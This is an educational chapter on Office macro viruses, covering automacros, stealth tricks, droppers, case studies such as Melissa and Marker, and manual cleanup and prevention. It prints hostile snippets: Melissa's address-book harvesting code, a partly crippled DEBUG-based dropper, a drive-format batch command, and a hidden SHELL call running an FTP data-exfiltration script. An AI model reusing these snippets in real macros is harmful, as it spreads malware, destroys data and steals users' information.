A simple macro is series of steps that could otherwise be typed, selected, or configured, but are stored in a single location so they can automated.
Many programs, such as Word, allow you to record a series of keystrokes and menu selections and then save them to a file. Although nifty, creating a macro one keystroke at a time doesn't make for fast or sophisticated application development. Macro languages are used to allow more sophisticated macro development and environment control. Screens can be manipulated, users can be prompted for input, and nested if-then statements add functionality. Macro languages allow a developer to manipulate and create files, change menu settings, import and export data, and much more.
A macro language is a programming language, but it has its drawbacks. First, and most obvious, it cannot run without the underlying application. This leads into the second drawback -- macro languages are usually interpreted, not compiled. Each macro command must be eventually broken down into its runtime counterpart, and this translation takes time. Programs with large macros or large amounts of manipulated data are very slow.
- Easy to write.
- Everyone exchanges documents and data, and in doing so, macro viruses can infect more people than their more complex counterparts.
- Can be
cross-platform and multicultural, infecting any computer capable of running
- Internet Explorer can automatically download Office documents from the Web or from within emails without prompting the user to confirm the download.
With few exceptions,
macro viruses are spread when a user opens or closes an infected document. Documents are spread between users in the following ways: email,
diskette, Internet, and CD-ROM.
Although applications may share a common macro language, each has its own structure and way of operating. Macros written for one type of application usually do not work in another. Manipulating a document in Word is completely different than moving around in an Excel workbook. Even similar events, such as adding together the numbers from two cells, bears little resemblance to each other behind the scenes. To understand macro viruses, you must understand how each application uses macros.
Although macros in Word can be saved in a document, they are more often stored in a separate file type called a template (prior to Word 97, macros had to be stored in a template). The template can contain many of the settings a user wants to include in her default document, like font type, toolbar settings, key assignments, styles, font size, page layout, etc. Every Word document is based on a template, and that template is linked to the document. Whenever an existing or new document is opened, the template settings are applied first. A global template, usually called NORMAL.DOT, is in memory every time Word is loaded. This is a favorite of virus writers, because a macro placed there is able to infect more quickly.
Word comes with dozens of predefined templates for form letters, fax cover letters, business memos, and other forms. You can define your own personal templates and load them into whatever documents you like using the Tools-.Templates and Add-Ins. To create a new template, take a blank document and make the changes to it that you would like to see reflected in all documents based upon the template. Then save your document as a .DOT file type with File->SaveAs. When you start a new document with File->New, select your new template. You can turn any template into a global template and load more than one global template at one time.
Templates are typically stored in a single subdirectory, which you can check by choosing Tools->Options->File Locations, but they can be loaded from several locations. Personal custom templates are stored in the User template directory, and templates shared between users are stored in the Workgroup template subdirectory. By default, the user templates are stored in C:\%windir%\Application Data\Microsoft or C:\%windir%\Profiles\%user_name%\Application Data\Microsoft. Any document saved as a template (regardless of the extension) and saved into a template subdirectory will function as a template.
Like other applications with macro languages, Word and Excel have the ability to automatically launch a macro when a document or template is opened or whenever some other key event is initiated. This is done by naming a macro after a predefined keyword reserved for such a purpose. Here are some of the automacro's especially coveted by Word virus writers:
Runs whenever you start Word or load the global template
Runs whenever you open an existing
document (Auto_Open in Excel)
Runs whenever you create a new document
Runs each time you close a document (Auto_Close
Runs whenever you quit Word or unload the global template
There are other system macros, such as FileSave and FileClose in Word and Workbook_Activate and Workbook_Deactivate in Excel, that automatically run when their associated event happens. In these cases, saving or closing a file would run macros with those names. There are even system macros associated with different menu options that allow programmers to define their own happenings when a particular menu option is chosen. Virus writers love to hide their creations by rewriting what happens when a user chooses Tools->Macros by using a macro called ToolsMacro (known as menu interception).
Excel data files are
called workbooks and have an .XLS extension. Each workbook can contain
many worksheets (also known as sheets or spreadsheets). Each sheet has its own
tab within the workbook. Macros in Excel can be stored in the same workbook as
the data, but can also be stored in separate workbooks. Macros meant to be
available to all workbooks are usually stored in a workbook called PERSONAL.XLS
(used to be GLOBAL.XLM in earlier versions). This file functions much
like a global template in Word.
Excel has two startup directories where workbooks can be placed. Any workbooks in either startup directory will automatically be called when Excel is started. Excel's default startup directory is usually located at either C:\%windir%\Profiles\User_name\Application Data\Microsoft\Excel\XLStart or C:\%windir%\Program Files\Microsoft Office\Office\XLStart. An alternate startup directory can be selected using Tools->Options->General->Alternate Startup File Location.
Excel's automacros are called Auto_Open and Auto_Close. They are used in the same way as automacros in Word. Macros can also be activated by different key combinations, menu choices, and sheet activity. Macro viruses wishing to be activated every session need only infect a workbook and store themselves in Excel's startup directory. Then, when Excel loads, the virus loads. Most Excel viruses infect the current workbook, usually through a hidden sheet within the workbook, and also infect a startup directory workbook.Excel and Word both have the ability to load attached programs called Add-Ins. In Excel, add-ins usually have the file extension, .XLA. Legitimate add-ins extend the functionality of the underlying application. Newer Excel viruses are installing themselves as Excel add-ins (XA viruses) and using older Excel macro languages (called Excel Formula Viruses or XF viruses ) to exploit weaknesses in antivirus detection tools.
Office 2000 introduced a new security feature, built around digital signatures, to diminish the threat of macro viruses. Office 2000 automatically trusts macros (written in VBA6) that were digitally signed from authors who have been previously designated as trusted. Not all Office 2000 applications have the new feature, but Word, Excel, Outlook, and PowerPoint, do. Access, FrontPage, Publisher, and PhotoDraw, do not (although Access does have its own security mechanisms). Users must have Internet Explorer 4.0 or higher for the security to work. When opening a document containing macros, depending on security settings, Office may notify you that untrusted macros are present.
Office cannot ascertain whether the macro is dangerous or not, only that document contains macro code. You can choose to disable (the default option) the macros while opening the document, or enable them. Interestingly, the document path and name Office displays in the warning dialog box is not always the current location of the item. Don't let the bug confuse you.
In Office 2000, you can set macro security as High, Medium, or Low, within each supported application. High, the default, will disable all unsigned or untrusted macros, and accept all signed trusted macros. Medium, will prompt the user to accept or deny the macro if it is not trusted. And Low will let all macros execute automatically without prompting the user. You get to macro security by choosing Tools->Macro->Security.
Macros written in VBA6 can be digitally signed to prevent tampering.
When you first open a document containing signed macros, you may receive a warning that the signed project's certificate has not been authenticated. This means the project is signed, but that the signer has not been authenticated by an outside entity For most purposes, you should consider unauthenticated projects to be unsigned, unless you explicitly trust the signer. Word treats unauthenticated projects with a skeptical eye, but in some cases will allow you to accept them.
Whenever you receive a signed macro, Office will look to see if the signer is trusted. If not, Office will allow you to see the source's digital certificate of authenticity. The certificate attests that the signer is who she says she is. If you accept the certificate and signer as trusted, Office will prompt you about whether to Trust all macros from this source. If you do, Office will run all macros from the same source without any warnings. You have made the signer a trusted source. You can see your list of trusted sources by choosing Tools->Macro->Security->TRusted Sources from your application. When you install a brand new copy of Office, no sources are trusted (unless your network administrator has forced some through during a network install).
Microsoft Office 2000's security levels and
User will be prompted to disable or enable
Signed macros from a trusted source
Signed macros from an untrusted source
User shown certificate and prompted to disable or enable macros
User shown certificate and prompted to disable or enable macros
Signed macros with an invalid signature or certificate
User warned, macros disabled
User warned and prompted to disable or enable; or macros automatically disabled
Typically, menu options are rewritten by malicious macros to help the infection process.
The Excel macro virus, Laroux, is one of the most widely reported virus infections in the world today and is a good example to talk about. Written in 1996, it used VBA 3.0 to infect Excel 5.0 and later versions. When an infected workbook is opened, the virus uses the Auto_Open macro to hand over control to the main virus macro, check_files. The virus then checks to see if it has infected the current workbook and looks to see if an infected copy is stored in Excel's startup directory. If not, it infects the current workbook by creating a hidden infected sheet, and saves a copy of itself to a file created in the startup directory so that it gets loaded every time Excel starts. It then infects every sheet that is clicked on. It contains no intentionally destructive routines, but can still cause problems because of its lack of error checking. Macros and data can inadvertently be overwritten as the virus goes to work.
Advances in antivirus technology and Microsoft security changes forced macro virus writers to learn new tricks. This next section talks about macro virus technologies beyond the early examples.
Unfortunately, using VBA it is all too easy for a virus to send itself to other victims using email. VBA allows a virus writer to query the system to get all the necessary information (email application name, user's name and email password) and send an attachment via email. MAPI , or Messaging Application Programming Interface, is the de facto standard for Windows email programs. It can be used by many computer languages to send email from a user's workstation to another user. Example below shows how the Melissa virus read the address book of infected users to get 50 recipient's email addresses to send itself to:
;Comments by Roger A. Grimes
Set UngaDasOutlook = CreateObject("Outlook.Application")
;creating an instance of Outlook
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\
Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
;if Outlook is the email engine...
DasMapiName.Logon "profile", "password"
;get email user's name and email password
For y = 1 To DasMapiName.AddressLists.Count
;set up getting ready to count number of contacts in address book
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
;get up to 50 email addresses from address book
;end of Melissa code sample
Using those lines of code, Melissa was able to spread around the world in three days and shut down the world's biggest email servers. It also earned its programmer a guilty conviction. The malicious emailing is done in the background without the user noticing, with the exception of some temporary computer slowness. Hundreds of macro viruses now use VBA and MAPI to send themselves around the world, effectively becoming a new class of worms. The proliferation of emailing viruses has led most corporations to install a virus scanning engine on their email servers to remove the virus before it gets to the end user.
As macro viruses have become more popular, Microsoft has developed different notification methods that should alert the user that something is wrong. Unfortunately, all of these notifications are easy for macro viruses to disable, and even when they aren't, most end users don't understand what the warnings are trying to communicate. With Office 97 and 2000, the macro virus warnings are written a bit more clearly.
Macro viruses have a handful of ways to hide themselves from default end-user inspection, although most of the stealth routines will not take place until after the user has ignored the original warnings and accepted the virus first. A macro virus cannot disable preset warning prompts and settings during its first activation. The most common setting simply warns you of any document containing a macro, whether or not the macro is malicious.
Viruses can modify the registry settings to stop Office from notifying the user of any macros. Other security settings can be disabled in VBA by writing the appropriate macro command to an infected template. The following macro commands all contribute to hiding the virus's activities:
Another common stealth technique is to disable the Tools->Macro menu option so the running macros cannot be inspected. One of the earliest Word macro viruses, Colors, is considered the first stealth macro virus because it used that method to hide. Even stealthier viruses create a fake Macro Editor menu that hides the presence of their macros. Since most Word macro viruses depend on infecting the global template, they will disable Word's default prompt of Save Changes to Global Template so the new macros are saved without end-user notification. Lastly, macros and documents written in previous versions of Office will end up making newer versions that prompt the user to see if they want to convert. Macro viruses can disable the prompt so Office will convert the document without asking the user for a response. Even if a virus turns off the conversion prompting, if the end user is looking, Office usually displays the macro name being converted on the status bar during the conversion process. Most users don't notice.
In Word Basic, macros can be marked as Execution-only with a simple command-line switch when copying a macro:
Example: MacroCopy "Test.Dot:AAAZFSA", "Global:FileSaveAs", 1
The 1 tells WordBasic to make the macro Execution-only. Execution-only macros cannot be viewed or edited, although they are not especially encrypted. The Edit button will be grayed out whenever an Execution-only macro is selected. File editors can still view the file and make out subroutines, function names, and comments.
VBA allows macro viruses to "lock" themselves from viewing and can only be viewed if the user knows the correct password. However, if the VBA project is password protected, no modules can be copied for it. So, only viruses that use a very limited set of replication mechanisms (ones that either copy the file as a whole -- like X97M/Papa.B -- or ones that copy the data of the target file to the one containing the virus and then overwrite the target file with the modified infected one -- like X97M/Jini.A does) can exist.
Like their executable counterparts, many macro viruses change their appearance to avoid scanning detection. Random encryption routines are used to hide the virus code, but the cipher routines tend to be weaker than their executable virus counterparts. Some viruses randomly rename the macro names and memory variables. Others create their macros on the fly. They do this by storing most of the macros as plain text within the document, and calling a built-in macro builder. The macro builder then builds the macros and executes them.
One of the scariest mechanisms a macro virus can contain is a routine to install a more dangerous virus or Trojan. Although most macro languages limit the scope of what can be manipulated by the application, sophisticated macro languages (like WordBasic and VBA) allow the external file and operating system to be modified. VBA and WordBasic allow external files to be created and existing files to be deleted or modified. Many macro viruses create a text file containing hexadecimal byte codes (assembly language commands) on a user's hard drive, and then modify the AUTOEXEC.BAT file so that the next time the PC is rebooted, DEBUG.EXE is called to compile the text file and convert it to an executable, and then it is executed. Thus, an even more malicious virus or Trojan can attack a computer. And all the user did was open a Word document sent by a friend or coworker. An early macro virus named Nuclear was the first to including a virus dropper (although the first versions were too buggy to work). Example below shows sample coding that could be used in conjunction with DEBUG.EXE to spread a virus (code is deliberately crippled).
;First part of code creates the source code file to be compiled later
Open "C:\VIRUS.SCR" For Output as #1
;Source code called VIRUS.SCR
Print #1, "N VIRUS.COM"
;Compiled code will be called VIRUS.COM
;Next commands write in hexadecimal codes
Print #1, "E 0840 81 3C 44 75 21 80 3C 4D 74 12 80 3C 54 74 0D 8B"
Print #1, "E 0850 44 01 48 8E C0 03 44 03 8E D8 EB E9 8D 03 26 2B"
Print #1, "E 0860 44 F2 26 89 44 F3 1F 8C D8 2B E8 95 05 4D 01 2E"
Print #1, "E 0870 8C 1E 8E 05 0E 1F A3 95 05 8E C2 B0 D6 A2 B4 04"
Print #1, "E 0880 B9 DC 14 33 F6 33 FF FC F3 A4 8E D9 8C 06 E3 04"
Print #1, "Q"
;next create a batch file that will compile the virus
;needs to be added to autoexec.bat so that the next time the PC is
;rebooted, virus will run
Open "C:\GOTYA.BAT" For Output as #1
Print #1, "debug<virus.scr>nul"
;Feeds source code into DEBUG.EXE command to compile file
Print #1, "echo @C:\VIRUS.COM>>C:\AUTOEXEC.BAT
;inserts compiled virus into autoexec.bat file so it gets run after the
Shell "GOTYA.BAT", 0
;Shell command runs batch file to compile virus and modify autoexec.bat
;end of example
If you see code resembling the example above, you can be almost 100 percent sure it is a virus or Trojan.
VBA contains plenty of functionality to allow macro viruses to interact with the PC outside of the scope of the application. Here are a few examples:
· The VBA KILL command allows any file on the local hard drive to be deleted. It supports wildcard (* or ?) symbol use, although it won't work on Macintosh versions of Word.
· Macro viruses can delete subdirectories with the RMDIR command.
· The SHELL command is the most powerful command and allows any external command to be executed.
· Better yet, for malicious code writers it has a parameter, vbHide, which allows the external command to be run in a hidden window.
These four example commands can make any PC vulnerable to numerous types of attack.
Because macro viruses can contain many of the same macro names, such as AutoOpen or FileSaveAs, it is not uncommon for a document infected with two different macro viruses to end up creating a new virus that includes routines from each of the former.
Here are some representative sample descriptions that demonstrate the versatility of macro viruses.
This Melissa variant attempts to format local hard drives and corrupts CMOS memory, along with using email clients to forward itself. It drops off a batch file, called DRIVES.BAT, that contains the following the commands that will format hard drives:
echo y|format/q d: /v:Empty>NUL
This command is repeated for drives D thru Z.
It also edits the AUTOEXEC.BAT file to run a dropped malicious file, Y2K.COM. This executable file will attempt to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not result in permanent damage to your CMOS.
Marker is a Word macro virus that keeps track of who it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS. The .SYS file contains the virus code and the .VXD file is a script file that is used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in the example below:
;opens an ftp connection to hacker's ftp site
;logs user in as anonymous
;puts in password
;changes to subdirectory called incoming on hacker's site
;puts file transfer in ascii text transmission mode
;uploads tracking information to ftp site, where hsfedrt.sys can be any
;randomly generated name.
;ends ftp session
The macro code contains the following SHELL command, which allows it to do its work secretly:
SHELL "COMMAND.COM /C FTP.EXE -n -s:c:\netldx.vxd", vbHide
It also disables Word's macro warning prompt. It keeps track of the user information found in Word's User Name and User Address information fields. Thus, anyone infected can usually find out who infected them and trace the origin of the virus back several generations. The virus maintains a setting in the registry (HKCU\Software\Microsoft\MS Setup (ACME)\User Info\LogFile) to keep track of whether it has sent information from this particular user before. If so, it doesn't do it again.
Example below shows a log file provided in an example I received (names and addresses have been changed to protect the innocent):
'09:08:36 - Saturday, 28, Nov 1998
'Richard D. Collier, III
'02:50:31 PM - Saturday, 28 Nov 1998
'Straight-A Students, Inc.
'12:49:03 PM - Saturday, 9 Jan 1999
'Two Embargo, Suite 3800
'Richmond, CA 94111
The Codebreaker group released another intriguing macro virus. This one attempts to steal users' PGP private keys. PGP , or Pretty Good Privacy, is one of the world's most popular data and email encryption programs. PGP users have a private encryption key that is used to do the encrypting. It is encrypted itself, but usually protected by a weak password. The Caligula virus is a stealth Word infector written in VBA5. When loaded, it checks to see if the current Word document or global template contains a class module called Caligula. If not, it exports its source code to a file called IO.VXD, and imports it to the global template. On the 31st of any month, it will display a message saying "No cia, No nsa, No satellite, Could map our veins. WM97/Caligula © Opic [Codebreakers 1998]."
Each time the virus is run it looks to see if it has already tried to steal the user's PGP private key (if one exists) by looking in registry entry HKCU\Software\Microsoft\MS Setup (ACME)\User Info. It looks for the value, Caligula. If present, it means it has already tried, or PGP isn't loaded on the user's PC. If not, it looks for PGP's install path from the registry and searches for the private key, which by default is named SECRING.SKR. Next, a new text file, CDBRK.VXD, is created as an FTP scripting file to upload the user's private key to the Codebreakers' FTP site. Even on users' systems without PGP, the virus will keep on replicating like any normal macro virus. I'm not sure of the legal reasons, but many computer security experts said this macro virus action (the stealing of a user's private encryption key) did not violate U.S. law. Luckily, the Codebreakers web site was shutdown in an unrelated hunt for the Melissa virus writer.
Triplicate is a common macro virus and the first cross-platform virus to infect three applications: Word, Excel, and PowerPoint. It infects the global template in Word, places an infected workbook called BOOK1 in Excel's Startup directory, and creates a new macro module called Triplicate in Powerpoint. Triplicate was initially placed on a virus writer's web site, hidden in a web link. If a user clicked on the web link, it would load an infected document. In many cases, it would load in Word from within the browser without setting off any macro virus warnings.
GaLaDRieL is the first virus based on Corel Script, the macro language for Corel Draw. It does a simple file search for new victim files (files with .CSC extension and the appropriate attributes). When a suitable file is found, it looks for the following text, "REM ViRUS," which identifies previously infected files. Its nonmalicious payload goes off on June 6 and displays an excerpt from The Lord of The Rings.
Most of the newer versions of Office (97 and later) will warn you if a document, workbook, or datafile contains macros with the following message:
C:\<path>\<filename> contains macros. Macros may contain viruses. It is always safe to disable macros, but if the macros are legitimate, you might lose some functionality.
Holding down your Shift key while opening Word or
Excel, or while opening up a document, workbook, or template will
automatically disable any automacros present. The Shift key can be held
down while exiting to disable any AutoClose
Open up your suspected macro document, being sure to disable macros. You have three macro tools within Office at your disposal: Macro Editor, Organizer, and Visual Basic Editor. I usually use all three to ensure everything is cleaned up. Make sure the infected document is in the active window. Use the Macro Editor, Tools->Macro->Macros to view and delete any visible macros. Be sure to click All active templates and documents at the bottom. Choosing the Edit option opens up VBE so you can inspect the macro code closer. With VBE, you can remove individual macro lines, although since most documents and workbooks shouldn't contain macros, it's just as easy to delete the whole macro in the Macro Editor or Organizer. You can't view or edit macro code in the Organizer, as it acts on the macro as a whole. Clean any suspected templates before cleaning files, or else your hard work will be for naught.
Organizer excels at cleaning up and inspecting template files. Choose Tools->Templates and Add-ins->Organizer so you can view the visible macros and other associated template properties. If a template file contains properties that would be hard to re-create if the whole file was deleted, you can use the Organizer to create a new template from the old (minus the macro virus code):
1. Rename the old infected template prior to starting Word. Word will create a blank copy when you restart it.
2. Open the Organizer. The new global template should already be loaded in one window.
3. Open the old, infected template with the Open File button in the other window (you may need to select Close File first).
4. Select the Macro Project Items tab and delete suspected macros.
5. Use the other tabs to copy and delete other formatting properties as desired.
6. Click Close File to close the global template or file. When prompted to save changes to the file, choose Yes.
The Visual Basic Editor is one of your best tools for fighting macro viruses. First, open the suspected document in Word, and choose to disable macros, if prompted. Next, hit Alt-F11 to open VBE.
In the Project Explorer window, expand the suspected project. Expand the module folder and click on a module and it should appear in the code window. The figure below shows the PSD2000 macro virus and its source code. Remember, virus coding can be hiding in projects besides ThisDocument or ThisWorkbook.
If your virus scanner does not recognize the macro virus and you don't want to manually remove macro virus coding, save your Word document as rich text format (RTF). This will save most of the formatting, but remove the macro code (it will remove all macros, not just malicious code). You can then open it back up in Word and resave. Make sure the virus is not active, so it can't play tricks on you like the Cap virus does.
An alternate method is to select the entire document and repaste to a new, clean document file. Choose Edit->Copy. Close the infected document. Select File->New and select a template type to start a new document. Choose Edit->Paste to paste the document content (minus macros) to the new document. Use your macro inspection tools to verify that you did not copy the macro virus code with the content.
Macro viruses are the number one type of malicious mobile code. Here are some recommendations to prevent them from attacking your environment.
When the global template is modified, Word can be configured to notify you that the global template should be saved. Choose Tools->Options->Save tab, and then check the Prompt to save Normal template option. Then while exiting, if the global template has changed, Word will prompt you to save the template. If you have not intentionally modified it, this might infer that a macro virus is present and should not save it. All documents opened before you are warned that the virus is attempting to modify your global template, which may already be infected.